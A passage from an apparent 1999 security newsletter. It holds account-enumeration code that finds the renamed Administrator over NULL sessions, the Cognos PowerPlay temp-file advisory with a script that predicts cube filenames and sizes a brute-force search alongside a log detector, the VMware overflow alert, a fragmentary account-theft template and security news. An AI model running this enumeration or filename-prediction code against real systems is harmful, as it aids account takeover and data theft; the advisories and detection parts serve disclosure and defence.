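# Relative identifiers an enumerator cares about. 500 is what GetAdmin() looks for.
WELL_KNOWN_RIDS = {
    500: "Administrator (built-in)",
    501: "Guest (built-in)",
    512: "Domain Admins",
    513: "Domain Users",
    519: "Enterprise Admins",
}

NT_AUTHORITY = 5    # S-1-5-...
NON_UNIQUE = 21     # S-1-5-21-<machine or domain id>-<RID>


def parse_sid(sid: str) -> tuple[int, int, list[int]]:
    """Split 'S-1-5-21-a-b-c-500' into (revision, identifier authority, sub-authorities)."""
    parts = sid.strip().split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError(f"not a SID string: {sid!r}")
    revision = int(parts[1])
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if not subs:
        raise ValueError(f"SID has no sub-authorities: {sid!r}")
    return revision, authority, subs


def rid_of(sid: str) -> int:
    """The RID is the last sub-authority: what GetSidSubAuthority(pSID, count-1) returns."""
    return parse_sid(sid)[2][-1]


def domain_of(sid: str) -> str:
    """Everything but the RID: identifies the machine or domain that issued the SID."""
    _, authority, subs = parse_sid(sid)
    return "S-1-%d-%s" % (authority, "-".join(str(s) for s in subs[:-1]))


def is_builtin_admin(sid: str, domain_sid: str | None = None) -> bool:
    """True for the built-in Administrator of a machine/domain, whatever it was renamed to.

    GetAdmin() only checks the last sub-authority. Requiring the S-1-5-21 prefix (and, when
    known, the target's own domain SID) keeps the test from matching a S-1-5-32-* BUILTIN
    alias or the Administrator of some other trusted domain.
    """
    _, authority, subs = parse_sid(sid)
    if authority != NT_AUTHORITY or len(subs) < 2 or subs[0] != NON_UNIQUE:
        return False
    if domain_sid is not None and domain_of(sid) != domain_sid:
        return False
    return subs[-1] == 500


def find_admin(accounts: dict[str, str], domain_sid: str | None = None) -> list[str]:
    """accounts maps account name -> SID, as NetUserEnum + LookupAccountName would yield."""
    return [name for name, sid in accounts.items() if is_builtin_admin(sid, domain_sid)]


def describe(sid: str) -> str:
    """Label for the well-known RIDs, or just the numeric RID."""
    rid = rid_of(sid)
    return WELL_KNOWN_RIDS.get(rid, "RID %d" % rid)


# Constructed sample: the real Administrator was renamed "backup_op" and a decoy ordinary
# user named "Administrator" was created. Name-based enumeration is fooled; RID-based is not.
TARGET_DOMAIN = "S-1-5-21-1004336348-1177238915-682003330"
SAMPLE_ACCOUNTS = {
    "Administrator": TARGET_DOMAIN + "-1005",
    "backup_op":     TARGET_DOMAIN + "-500",
    "Guest":         TARGET_DOMAIN + "-501",
    "jsmith":        TARGET_DOMAIN + "-1001",
}

if __name__ == "__main__":
    for name, sid in SAMPLE_ACCOUNTS.items():
        print("%-14s %-45s %s" % (name, sid, describe(sid)))
    print("true administrator:", find_admin(SAMPLE_ACCOUNTS, TARGET_DOMAIN))
```

     find_admin() with the target's domain SID is the check to run over the NetUserEnum output: the decoy named Administrator with an
     ordinary RID is ignored and the renamed RID 500 account is reported, which is exactly what the tool above relies on. The other
     well-known RIDs are listed because 501 and 512 are the next questions an enumerator asks once 500 is answered.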


     Wrapper for listing the user accounts.....

     void DoNetUserEnum(const wchar_t* pServer, CNTOHunterDlg* pDlg, HTREEITEM userRoot, HTREEITEM adminRoot)
     {
         USER_INFO_10 *pUserbuf, *pCurUser;
         DWORD dwRead, dwRemaining, dwResume, dwRC;
         WCHAR RemoteResource[UNCLEN + 1];     // \\server + NULL
         DWORD dwServNameLen = lstrlenW(pServer);
         bool  GotAdmin;

         char userName[256];
         char userServer[256];

         dwResume = 0;

         //Same \\server fix-up as in EstablishNullSession
         if(pServer[0] != L'\\' && pServer[1] != L'\\')
         {
             //Start string with correct UNC slashes and NULL terminate
             RemoteResource[0] = L'\\';
             RemoteResource[1] = L'\\';
             RemoteResource[2] = L'\0';
         }
         else
         {
             dwServNameLen -= 2; // drop slashes from count
             RemoteResource[0] = L'\0';
         }

         if(dwServNameLen > CNLEN)
             return;

         if(lstrcatW(RemoteResource, pServer) == NULL) return;

         // Convert the server name back to ANSI once; GetAdmin() takes char strings
         WideCharToMultiByte( CP_ACP, 0, pServer, -1, userServer, 256, NULL, NULL );

         //Pull the account list in pages: the 1024-byte preferred length makes NetUserEnum
         //return ERROR_MORE_DATA and exercises the resume handle. Over a NULL session this
         //call is what RestrictAnonymous was introduced to deny.
         do
         {
             pUserbuf = NULL;

             dwRC = NetUserEnum(RemoteResource, 10, 0, (BYTE**)&pUserbuf, 1024,
                                &dwRead, &dwRemaining, &dwResume);
             if (dwRC != ERROR_MORE_DATA && dwRC != ERROR_SUCCESS)
                 break;

             DWORD i;
             for(i = 0, pCurUser = pUserbuf; i < dwRead; ++i, ++pCurUser)
             {
                 // Convert the account name back to ANSI.
                 WideCharToMultiByte( CP_ACP, 0, pCurUser->usri10_name, -1,
                                      userName, 256, NULL, NULL );

                 //Look the account up by SID; only RID 500 goes under the Admin node
                 CString Admin;
                 GotAdmin = GetAdmin(userServer, userName, Admin);
                 if(GotAdmin)
                     pDlg->m_Victims.InsertItem(Admin, adminRoot, TVI_LAST);

                 CString strUserName = userName;
                 pDlg->m_Victims.InsertItem(strUserName, userRoot, TVI_LAST);
             }

             if (pUserbuf != NULL)
                 NetApiBufferFree(pUserbuf);   //NetUserEnum allocated this buffer for us
         } while (dwRC == ERROR_MORE_DATA);

         if (dwRC != ERROR_SUCCESS)
             printf("NUE() returned %lu\n", dwRC);
     }


                               Send mail to with questions or comments about this document.
                                        Copyright  1999 NT OBJECTives, Inc.   All Rights Reserved.
                                         All trademarks are the property of their respective owners.
                                                   Last modified: June 28, 1999 
 05.0 Cognos PowerPlay Web Edition security vulnerability allows access to data cubes.
      Snarfed from PacketStorm Security:
       Date: Mon, 28 Jun 1999 07:29:37 -0400
       From: Darin White 
       Subject: Cognos PowerPlay Web Edition security
       Release Date:  1999-06-25
       Application:   Cognos PowerPlay Web Edition
       Severity:      Unauthenticated web users can sniff cube data
       Author:        Darin White
       Operating Sys: Microsoft NT Server
       I. Description
       Due to design problems as well as some potential web server
       misconfiguration PowerPlay Web Edition may serve up data cubes
       in a non-secure manner.  Execution of the PowerPlay CGI
       pulls cube data into files in an unprotected temporary
       directory.  Those files are then fed back to frames in the
       browser.  In some cases it is trivial for an unauthenticated
       user to tap into those data files before they are purged.
       Cognos has been contacted but does not regard this as a
       serious exposure (see appendix B below).
       The issues are:
       (a) dynamic directory listing
       (b) weak temporary filename algorithm
       (c) ad hoc parameters to the CGI
       II. Details
       Identifying PowerPlay sites is quickly accomplished using AltaVista
       (join last two lines) which hits all pages containing a link to the
       PowerPlay CGI ppdscgi.exe on NT.
       Normal authentication for protected cubes occurs when a user selects
       a link like:
       At this point the user is prompted for a userid and password.
       Beyond this check there seems to be no verification that data
       is being fed out to the browser that requested it and was
       (a) dynamic directory listing
       Netscape Enterprise Server 3.5.1 appears to be serving up dynamic
       directory listings by default.  A known PowerPlay site can be hit
       with a request for which will
       return something like:
       /ppwb/Temp/ -
          6/25/99  9:17 AM        17904 1ad6t.htm
          6/25/99  9:17 AM        37828 1ad6x.htm
       Here we see two temporary files created by one initial cube request.
       The suffix 't' in the first filename denotes the PowerPlay toolbar
       and 'x' denotes the data content.  These files are fed back to the
       browser to populate two frames.  Clicking on the content filename
       will allow any user to browse the current cube view with no
       authentication challenge even if the cube has been password-protected.
       Once into the cube the user may continue to drill for further data.
       (b) weak temporary filename algorithm
       Sites that have disabled directory listing may still be vulnerable.
       Many sites using PowerPlay offer a mix of protected and unprotected
       cubes.  Some sites also offer an anonymous user account (let's say
       "guest" for example). The PowerPlay CGI uses a common temporary
       directory for serving all cubes back to the browser.  Using the
       guest account or viewing an unprotected cube a user may right-click
       the content area and select View Frame Info which will display
       the temporary filename.  By repeatedly reloading the initial cube
       view and viewing frame info a list of temporary filenames may be
       generated in order to analyze the filename algorithm.  e.g.
       Analysis of the filename progression shows:
       * the last char is 'x' for the data and 't' for the toolbar
       * first n-1 chars are hexadecimal chars only
       * the hexadecimal "numbers" comprising the filename are ascending only
       * the first char is never 0.  e.g. fffx.htm => 1000x.htm
       * simple hexadecimal subtraction on the first n-1 chars of consecutive
       filenames shows a very predictable pattern (see appendix A)
       A user may orient themselves in the namespace (the set of all possible
       filenames) by using a guest account or unprotected cube.  Once oriented
       a set of candidate filenames may be generated and requested from
       /ppwb/Temp on the server.  Of course this approach assumes valid
       users are hitting the cubes at the same time.  Once a successful
       hit has been made on a temporary file the user may drill further
       into the data as described in (a) above.
       Alternatively a brute force attack on a server could be attempted
       by just submitting requests for all possible filenames.  Of course if
       you could establish some idea of how long the site has been operational
       you might start with 4-char filenames.  A very new site with low traffic
       (if the owner displays a page counter) might be best approached with
       3-char names.  This type of attack would present a beat-the-clock
       situation as the ~65000 requests (for 4-char) scanned for an existing
       file before it was purged from the Temp directory.
       (c) ad hoc parameters to the CGI
       A variety of parameters to
       provide additional information on the PowerPlay server.
       * ?ABOUT= will return the version of PowerPlay.
       * ?TOC (or no parameter) presents a table of contents list of all
       web-enabled cubes on the server.  Some sites are using static page
       links to hit cubes rather than relying on PowerPlay's generated TOC.
       They may not be aware that all cubes are available.
       * the hidden parm PPWB in the data contents frame details the unaliased
       location of the temporary directory.  e.g.
       INPUT TYPE="HIDDEN" NAME="PPWB" VALUE="C:/Netscape/SuiteSpot/docs/ppwb">
       III. Solution
       (a) dynamic directory listing
       Turn this feature off on your web server following the directions
       provided by the server vendor.  If you are unable to disable this
       feature you may create an index.html file in the /ppwb/Temp directory
       that will load when a filename has not been specified in the URL.
       (b) weak temporary filename algorithm
       This is really on Cognos' plate.  Watch your error logfile for
       a lot of failed requests for /ppwb/Temp/*.htm to at least detect
       an attack.  Removing anonymous cube access may slow an attack.
       (c) ad hoc parameters to the CGI
       Just be aware of what is available by altering the parameters.
       Don't assume your cubes are hidden because there is no direct
       link to the table of contents from the web.  Password protect
       your cubes.
       Appendix A
       Here's the output of one subtraction run which shows the v6.5
       temporary filenames and then the hex delta between adjacent filenames:
       Processing  test.dat  ...
       216bx.htm Ax
       2188x.htm 1Dx
       2192x.htm Ax
       219cx.htm Ax
       21a6x.htm Ax
       21afx.htm 9x
       21b9x.htm Ax
       21c3x.htm Ax
       21cdx.htm Ax
       21d7x.htm Ax
       21e0x.htm 9x
       21eax.htm Ax
       21f4x.htm Ax
       21fex.htm Ax
       2207x.htm 9x
       2211x.htm Ax
       221bx.htm Ax
       2225x.htm Ax
       222fx.htm Ax
       2238x.htm 9x
       2242x.htm Ax
       224cx.htm Ax
       2256x.htm Ax
       2260x.htm Ax
       2269x.htm 9x
       2273x.htm Ax
       227dx.htm Ax
       2287x.htm Ax
       2291x.htm Ax
       229ax.htm 9x
       diff    count
           A :  23
          1D :   1
           9 :   6
       out of   31 filenames
       Here are some other summaries:
       diff    count
        203B :   1
          DF :   1
          13 :   4
           A :  10
          14 :   3
          27 :   1
           9 :   1
       out of   22 filenames
       diff    count
          3E :   1
           A :  19
           9 :   5
       out of   26 filenames
       Analysis of filenames created under v6.0 of PowerPlay Web Ed. showed:
       25cx.htm 1x
       25dx.htm 1x
       25ex.htm 1x
       25fx.htm 1x
       260x.htm 1x
       261x.htm 1x
       262x.htm 1x
       263x.htm 1x
       264x.htm 1x
       265x.htm 1x
       266x.htm 1x
       267x.htm 1x
       268x.htm 1x
       269x.htm 1x
       26ax.htm 1x
       26bx.htm 1x
       26cx.htm 1x
       diff    count
           1 :  17
       out of   18 filenames
       diff    count
         37E :   1
           1 : 491
       out of  493 filenames
       diff    count
         1E7 :   1
           1 : 295
       out of  297 filenames
       diff    count
           1 : 1255
       out of 1256 filenames
       Appendix B
       1999-06-10 analysis submitted to Cognos
       1999-06-11 submission acknowledged
       1999-06-18 response from Cognos (below)
       Hello Darin,
       Thank you for the descriptive analysis of your problem. I understand that
       you have set up anonymous access and therefore you are aware of the security
       risk. I agree that the temp file generation is predictable and would suggest
       logging an enhancement through our web site.
       In the interim you have to weigh what is acceptable in terms of security
       knowing that there are other alternatives such as SSL and LDAP. These other
       options will of course offer substantially more protection.
       In conclusion your analysis is correct, now it is a factor of weighing your
       security wants and needs.
       Michael Bockholt
       Cognos Support Specialist
       Tel: 1-800-637-7447
       Darin White
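       The filename analysis of section II(b) and the log check suggested in III(b), as an added example that is not part of Darin
       White's advisory: a Python script that reproduces the appendix A subtraction run on the v6.5 names listed there, predicts the
       names a concurrent session will be handed next from the observed deltas, sizes the brute-force namespace from the "first char
       is never 0" rule, and counts failed /ppwb/Temp/*.htm requests per client in web-server log lines. The filename list is copied
       from appendix A; the log lines and the NCSA common-log regex are assumptions of the example, not anything from the advisory.

```python
"""
Added example (not part of the advisory): PowerPlay temp-name delta analysis, next-name
prediction, namespace sizing and a log check. Log lines below are constructed.
"""
from __future__ import annotations

import re
from collections import Counter

# <hex counter><t|x>.htm - 't' is the toolbar frame, 'x' the cube data frame
TEMP_NAME = re.compile(r"^([0-9a-f]+)([tx])\.htm$", re.IGNORECASE)


def parse_temp_name(name: str) -> tuple[int, str]:
    """'21afx.htm' -> (0x21af, 'x')."""
    m = TEMP_NAME.match(name.strip())
    if not m:
        raise ValueError(f"not a PowerPlay temp name: {name!r}")
    return int(m.group(1), 16), m.group(2).lower()


def format_temp_name(value: int, suffix: str = "x") -> str:
    """Inverse of parse_temp_name: lowercase hex, no leading zeros, as the server writes them."""
    return "%x%s.htm" % (value, suffix)


def hex_deltas(names: list[str]) -> list[int]:
    """Differences between consecutive observed counters (the advisory's subtraction run)."""
    values = [parse_temp_name(n)[0] for n in names]
    return [b - a for a, b in zip(values, values[1:])]


def delta_summary(names: list[str]) -> Counter:
    """diff -> count table, as printed in appendix A."""
    return Counter(hex_deltas(names))


def predict_next(last_seen: str, deltas: set[int], steps: int) -> list[str]:
    """Every name reachable from last_seen in 1..steps increments drawn from `deltas`."""
    start, suffix = parse_temp_name(last_seen)
    frontier = {0}
    offsets: set[int] = set()
    for _ in range(steps):
        frontier = {f + d for f in frontier for d in deltas}
        offsets |= frontier
    return [format_temp_name(start + o, suffix) for o in sorted(offsets)]


def namespace_size(nchars: int) -> int:
    """Count of nchars-long counters: first char is never 0, the rest are any hex digit."""
    return 15 * 16 ** (nchars - 1)


# Detection side: many 404s for /ppwb/Temp/*.htm from one client is the brute force of
# section II(b). NCSA common log format is assumed for this example.
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (/ppwb/Temp/[0-9a-fA-F]+[tx]\.htm) HTTP/[\d.]+" (\d{3})')


def temp_probes(log_lines: list[str]) -> Counter:
    """client -> number of failed (404) requests for temp cube files."""
    probes: Counter = Counter()
    for line in log_lines:
        m = CLF.match(line)
        if m and m.group(3) == "404":
            probes[m.group(1)] += 1
    return probes


# The v6.5 names listed in appendix A of the advisory.
APPENDIX_A_V65 = [
    "216bx.htm", "2188x.htm", "2192x.htm", "219cx.htm", "21a6x.htm", "21afx.htm",
    "21b9x.htm", "21c3x.htm", "21cdx.htm", "21d7x.htm", "21e0x.htm", "21eax.htm",
    "21f4x.htm", "21fex.htm", "2207x.htm", "2211x.htm", "221bx.htm", "2225x.htm",
    "222fx.htm", "2238x.htm", "2242x.htm", "224cx.htm", "2256x.htm", "2260x.htm",
    "2269x.htm", "2273x.htm", "227dx.htm", "2287x.htm", "2291x.htm", "229ax.htm",
]

# Constructed log excerpt: one client walking a predicted window, one legitimate hit.
SAMPLE_LOG = [
    '10.0.0.7 - - [28/Jun/1999:09:17:01 -0400] "GET /ppwb/Temp/22acx.htm HTTP/1.0" 404 210',
    '10.0.0.7 - - [28/Jun/1999:09:17:01 -0400] "GET /ppwb/Temp/22adx.htm HTTP/1.0" 404 210',
    '10.0.0.7 - - [28/Jun/1999:09:17:02 -0400] "GET /ppwb/Temp/22aex.htm HTTP/1.0" 200 37828',
    '10.0.0.9 - - [28/Jun/1999:09:17:02 -0400] "GET /ppwb/Temp/22a4x.htm HTTP/1.0" 200 37828',
]

if __name__ == "__main__":
    for diff, count in delta_summary(APPENDIX_A_V65).most_common():
        print("%5X : %3d" % (diff, count))
    print(predict_next("229ax.htm", {0x9, 0xA}, steps=2))
    print("4-char namespace:", namespace_size(4))
    print(temp_probes(SAMPLE_LOG))
```

       On the appendix A names the summary comes out as A:22, 9:6, 1D:1 (one delta fewer than the advisory's table, which counted a
       predecessor not listed); with deltas {9, A} the set of candidates two files ahead of the last name is only five entries, which is
       why the advisory says that orienting via a guest cube makes the attack cheap. namespace_size(4) gives 61440, the "~65000 requests"
       of a blind 4-char brute force, and that count of 404s against one /ppwb/Temp client is the signal to alert on.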
06.0 VMware Security Alert
     Snarfed from PacketStorm Security:

       Date: Fri, 25 Jun 1999 19:18:35 -0700
       From: Jason R. Rhoads 
       Subject: VMware Security Alert
            VMware Security Alert
             Date: June 25th, 1999
       On June 22nd, 1999, VMware, Inc. was notified of a security problem with VMware for Linux 1.0.1. This security hole is
       also present in all previous versions of VMware for Linux. The security hole has been fixed in VMware for Linux 1.0.2
       released today. The security hole allows a buffer overrun attack against VMware for Linux to result in unprivileged root
       access to a machine. An updated version of VMware for Linux which fixes this problem is available now, see below. As
       far as we know, this breach has never been used for malicious purposes, or caused any harm to customer installations.
       VMware, Inc. apologizes for the inconvenience to our users.
       Vulnerable Systems
       The security hole allows an attack to occur during VMware startup, but before a virtual machine is powered on. Guest
       operating systems themselves are unlikely to be affected by these buffer overflow attacks. Systems most vulnerable to
       this attack are multi-user Linux systems that have VMware installed. A malicious user with access to an account on the
       system could exploit the hole. Stand alone single-user machines are not at high risk from this security hole. This hole
       does not allow direct network based 'worm' style attacks against VMware.
        This security hole was discovered by Asylum Security, a division of CyberSpace 2000, a professional computer security
        response team.  VMware has taken immediate action in response to this event. VMware for Linux 1.0.2 was made
       available for download on June 25th, 1999 on our web site and mirror sites. The shipment of CD-ROMs has been
        suspended and the inventory discarded. Customers who have purchased VMware for Linux have been notified by electronic mail.
        VMware has also posted security alerts to newsgroups at
       Affected VMware Releases
       This security hole is present in VMware for Linux 1.0.1 and all previous  versions, including the beta versions
       (build-106, build-135, build-152) and the experimental version (build-179). VMware recommends that users replace
       beta and experimental versions with VMware for Linux 1.0.2. An updated VMware for Linux experimental release with
       fixes for this security hole will be made available in the near future.
       How to Close this Security Hole
       The security hole can be closed by simply upgrading to VMware for Linux version 1.0.2: 
            1.Download VMware for Linux 1.0.2 from one of our mirror sites
            2.Untar the distribution.
                 tar zxvf vmware-1.0.2.tar.gz
            3.Change directory to vmware-install
                 cd vmware-install
            4.As root, install VMware for Linux
              You will first be asked whether you want to upgrade VMware for Linux. Simply answer yes at this point and
              then follow any installer instructions.
              NOTE: It is not possible to resolve this security problem by removing suid (Set User ID) root privileges from
              the VMware executable. VMware must be suid root to run correctly.
       Reporting Security Issues
       VMware is committed to addressing security issues and providing customers with information on how they can protect
       themselves. If you identify what you believe may be a security issue with a VMware product, please send an email to We will work to appropriately address and communicate the issue.
       Notification of Security Alerts
       When VMware becomes aware of a security issue that significantly affects our products, we will take action to notify
       affected customers. Typically this notification will be in the form of a security bulletin explaining the issue, and where
       possible a response to the problem. These bulletins will both be emailed to affected customers and posted on our web site
       and newsgroups at 
       Date: Sat, 26 Jun 1999 17:33:22 -0400
       From: Don 
       Subject: VMWare Advisory - buffer overflows
       This advisory was made on 06/21/99 and was to be released on 06/28/99 (or
       after a fix was released). We would like to recognize the VMware staff and
       their responsiveness to the bug reports.  Last night, customers who
       purchased their product received notices to upgrade to VMware v1.0.2.
       For more information on the VMware bugs, visit:
       -Don Sausa
       ----------[asylum security]------------
       id: #99021, team director
       Team Asylum Security
       Copyright (c) 1999 By CyberSpace 2000
       Source: Seth L. []
       Advisory Date: 06/21/99
       Release Date: 06/28/99
       [ Final Revision: 06/25/99 ]
       VMware v1.0.1 and earlier for Linux.
       Product Description
       VMware v1.0.1 is a software product by VMware, Inc. that creates a
       virtual machine in which you can install multiple operating systems
       without repartitioning or formatting your hard drive.
       Vulnerability Summary
       Team Asylum has found multiple buffer overflows existing in VMware v1.0.1
       for Linux.  Earlier versions also have the same buffer overflows.
       VMware Inc. has been notified of these overflows and they have released
       VMware v1.0.2 as a fix.  Any local user can exploit these overflows to gain
       root access.
       All users are encouraged to upgrade to VMware v1.0.2.  You may download
       it directly off
       Special Thanks
       Special thanks to VMware staff for responding quickly to our bug reports.
       Within 3 days, they have managed to fix the overflows, as well as stop the
       physical distribution of their v1.0.1 product.  All customers who have
       purchased VMware have been notified as of 06/25/99 12:00 midnight (PST)
       about the new VMware v1.0.2 version.
 07.0 Security vulnerability in login template 
      Snarfed from PacketStorm Security:
        A security vulnerability in which allows any user to
        steal another user's account and gain full access to
        it, including credit card (cc#) information.
        No fix yet. The affected site has been informed.
       exploit template

Change My Password - ego's M0D1Fi3D verzi0n

Highlight the User ID: This is the hustler account thief script
in order for this to work you must know
somones real login name ( if its an old carded
account with a nick like XTC, give up
you cant steal a froozen account, but
yea.. u can change its password...
Enter Your New Password Enter Password again
@HWA 08.0 DOD investigating computer 'Mob-like' tactics ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week; JUNE 30, 1999 . . . 12:25 EDT DOD investigating computer 'mob tactics' BY DANIEL VERTON ( While a senior adviser to the Defense Department testified before Congress this week on threats to national security stemming from the export of powerful computer technology, his supervisor allegedly attempted to access and tamper with his computer, prompting the immediate launch of a full-scale investigation. Rep. Dan Burton (R-Ind.), chairman of the House Government Reform Committee, said Jay Davis, director of the Defense Threat Reduction Agency, informed the committee on June 28 that an investigation was under way into an incident involving unauthorized access to the computer belonging to a senior strategic trade adviser to the agency. According to Burton, the incident took place while Peter Leitner, a longtime internal critic of DOD's policy on exporting sensitive computer technologies, was testifying on June 24 before the committee regarding security problems stemming from that policy. Although no details from the investigation have been released yet, Burton claims that the incident is an example of DOD officials trying to strong-arm a congressional witness into not cooperating with the committee. "While Dr. Leitner was telling my committee about the retaliation he suffered for bringing his concerns to his superiors and Congress, his supervisor was trying to secretly access his computer," Burton said. "This smacks of mob tactics. Congress will not stand for this kind of witness intimidation." Although DTRA has launched an investigation into the incident, Burton said he plans to call upon Defense Secretary William Cohen to ask for "his personal involvement" in the case. "I intend to ask a lot of questions of the Defense Department officials involved, and I expect to get straight answers," Burton said. 
Leitner has criticized the department's policy of easing export controls on powerful computer technology that is used to simulate and test the reliability of nuclear weapons, claiming that the acquisition of supercomputer technology abroad was feeding a new form of Cold War characterized by an arms race for "virtual weapons." @HWA 09.0 GSA announces Intrusion Detection Net ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Federal Computer Week; JUNE 28, 1999 GSA launches intrusion-detection net BY DIANE FRANK ( The General Services Administration last week asked industry for information about emerging security technology for detecting unauthorized users on agency networks, with the goal of building a government intrusion-detection system by the end of next year. In building the Federal Intrusion Detection Network (Fidnet), GSA hopes to find security tools vendors are developing that overcome the weaknesses of existing technology. By keeping ahead of the latest technology, GSA hopes to leave agency defenses less vulnerable to hackers, agency officials said. "We want to encourage people to develop new technologies that will help us keep neck and neck with the perpetrator," said David Jarrell, program manager for the GSA portion of Fidnet in the Federal Technology Service's Office of Information Security and technical director of the Federal Computer Incident Response Capability. OIS will look not only to established intrusion-detection vendors but to new companies and people that "we haven't even heard of," Jarrell said. "I think there are people out there that are significantly brilliant enough to solve this and we hope that this [request for information] will cause them to come forward," he said. GSA plans to use the vendor-provided information to develop prototypes by the first quarter of fiscal 2000, said Tom Burke, GSA's assistant commissioner of information security. 
Down the line, OIS may even pay some of the vendors to put together a long-term, real-world demonstration of their capabilities at an agency, he said. GSA particularly is interested in finding intrusion-detection systems that are more capable of detecting attacks as they happen instead of after the fact. The problem is that most intrusion-detection solutions work the same way anti-virus protection does: They check network-use patterns against a known list of intrusion "signatures" and send out alerts when they come across a match. But as vendors and users have known for years, this method will not catch intrusions that are not on that list. Also, most products just now are advancing to the point where they alert administrators at the time an intrusion takes place. "We find that many of the off-the-shelf products that are available today are really a response to the intrusions, and they are always a step behind the intruder," Jarrell said. "We want to look to the future and some artificial intelligence that will learn as it goes about the attacks that are being launched." This type of capability would be more than welcome to agencies, especially if they are enabled to respond more quickly at the local level, said one senior civilian agency official. Others recognized the potential benefits of sharing attack "experience" across government. "What I would hope this next-generation intrusion detection could bring to us is the capability not only to monitor [intrusions] but to put together the information in a history for reference," said Sarah Jane League, Defense Department liaison at the Critical Infrastructure Assurance Office. "It should bring that pattern recognition and learn as it that over time it will have the ability to recognize" not only attacks but what could be attacks, she said. Vendors have been working on this type of product, sometimes called anomaly detection, for some time. 
"ISS has a lot of research efforts in place to advance the intrusion-detection market," said Mark Wood, intrusion-detection product manager at Internet Security Systems Inc., maker of the Real-Secure intrusion-detection product line. "Having a pre-defined list of signatures is nice, but you'd like to detect novel attacks, things you don't know about." One major problem vendors are struggling with in producing this type of solution is the large number of "false positives" -- incorrectly perceived attacks -- that are generated when a network is scanned, Wood said. Despite this, a commercially viable solution could be available within the next year, he said. "It's certainly worthwhile that someone like the GSA is driving this; it's absolutely necessary," Wood said. "Perhaps this will help coordinate the industry so that they will provide something sooner than they would have." The need for this type of solution across government has been underscored by the more than 40 federal World Wide Web sites that have been hacked in the last two months, including at least six last week. And these attacks are only the most noticeable types of intrusions into government networks, according to federal experts testifying before Congress last week [see related story, "House member suggests regular network security reports"]. However, in the end, while many would wish otherwise, keeping up with attackers instead of one step behind really is the best that anyone can do, Jarrell said. "There is no silver bullet; there is no perfect solution when it comes to intrusion detection," he said. "As I've said before, if you build a better mousetrap, a better mouse will evolve." @HWA 10.0 Nasa servers reportedly hacked ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From 30 Jun 1999, 10:51 AM CST By David McGuire, Newsbytes. MINNEAPOLIS, MINNESOTA, U.S.A., . 
In what appears to be the third computer attack on a government Website this week, crackers may have gained unauthorized access to one or more National Aeronautics and Space Administration (NASA) servers yesterday.

"There is some indication that a couple servers at the Marshall Space Flight Center in Huntsville, Alabama" were attacked earlier this week, a NASA spokesperson told Newsbytes today. NASA could not confirm the reports as of this writing. The Marshall site was up and running as of 11:00 EDT today.

While Sunday's hack of the US Army's home page typifies the kind of high-profile attack favored by many hacker (more accurately known as cracker) groups, the apparent Marshall attack and yesterday's crack of National Oceanic and Atmospheric Administration's (NOAA) Norman, Okla.-based Storm Prediction Center are more puzzling, Newsbytes notes. Marshall is a fairly low-profile NASA center that focuses primarily on research in the areas of astronomy, low gravity, and space shuttle propulsion. The Storm Prediction Center (SPC) provides nationwide weather forecasts.

The SPC hack caught NOAA by surprise. "At about three AM, some Internet customer called one of our forecasters and said 'You better check your Website,'" SPC Director Joe Schaefer told Newsbytes yesterday. "We produce weather forecasts for the whole country," he said. "We are doing a public good. There is no way I can see that we are harming anybody. To come after a site like this is strange, to put it mildly."

The Army hack was somewhat more typical. At some point Sunday night, crackers replaced the Army's home page with a page that read "Hello, this Website hack has a purpose. The purpose is to settle rumors. Global Hell is alive, Global Hell will not die," Lt. Col. Ron Burns of the Army's Director for Information Systems Command, Control, Communications and Computers (DISC4) unit told Newsbytes Monday. Sunday's attack was the first successful crack of the Army's main site, located at .
The US Senate and Federal Bureau of Investigation (FBI) have also suffered recent Website attacks. The FBI declined comment on the string of hacker attacks.

Reported by, . 10:51 CST Reposted 10:59 CST

@HWA

11.0 UK May Force ISPs to Install Taps
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN contributed by Weld Pond

The British Interception of Communications Act has been the target of proposed changes recently. The changes would require all communications service providers to build in, at their expense, capabilities for government agents to be able to listen in to communications. This proposal is particularly broad as it does not stop at the internet and covers everything from pagers to video conferencing to VPNs. These new requirements have been proposed by the International Law Enforcement Telecommunications Seminar (ILETS), an exclusive FBI-funded group that meets in secret.

Tech Web

U.K. Wants ISPs To Build In Interception
(06/25/99, 3:40 p.m. ET)
By Duncan Campbell, TechWeb

The British government has become the first in Europe to openly propose internationally agreed requirements for ISPs to build technology into networks that would allow for police surveillance.

Under proposals for changes to the Interception of Communications Act announced by the Home Office this week, all communications service providers (CSPs) would be required to build interception software or hardware into their systems. The law -- if passed -- will apply to all types of new communications services, including Internet telephony, TV conferencing, paging, and satellite based personal communications systems.

The International User Requirements have been drawn up over the past six years by a group founded by the U.S. FBI, called the International Law Enforcement Telecommunications Seminar (ILETS), which meets in secret.
The group excludes representatives from industry or civil rights organizations, and has attempted to standardize its objectives as an International Telecommunication Union requirement.

According to this week's "white paper," every type of network will be covered, including VPNs operated through the Internet or other TCP/IP systems. The new law will also cover interception of business telecom services, ranging from basic networks of a few lines found within a small office to large networks linking offices, in both the public and private sectors, the document says.

Under the present British Interception of Communications Act, only licensed public telecom operators have to provide government tapping facilities within their networks. However, ISPs must surrender any stored communications data they have, including e-mail, Web-access records, and service details, if served with an order.

Home Secretary Jack Straw now proposes all CSPs be required to take reasonable steps to ensure their system is capable of being intercepted. "This will be an ongoing requirement CSPs will have to consider each time they develop their network or introduce new services," Straw said. "CSPs will also be required to provide reasonable assistance to effect warranted intercepts." This will include real-time access to data about their subscribers and information about services they have used, including logs of telephone calls, e-mail, or website accesses.

A key part of technical arrangements to be made will ensure operators will not be able to know what information has been copied from their systems.

The British government said the new law would make full provision for human-rights legislation, Straw said. But according to Madeleine Colvin of Justice, the international human-rights organization and British section of the International Commission of Jurists, the proposed law would not achieve this. "There are major gaps in what these proposals suggest for controlling surveillance methods.
For example, how is anyone to know if their human rights may have been abused if they are never going to be told that their e-mail has been intercepted by the government?" she asked.

@HWA

12.0 Crypto Tie Downs Loosened
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN contributed by mortel

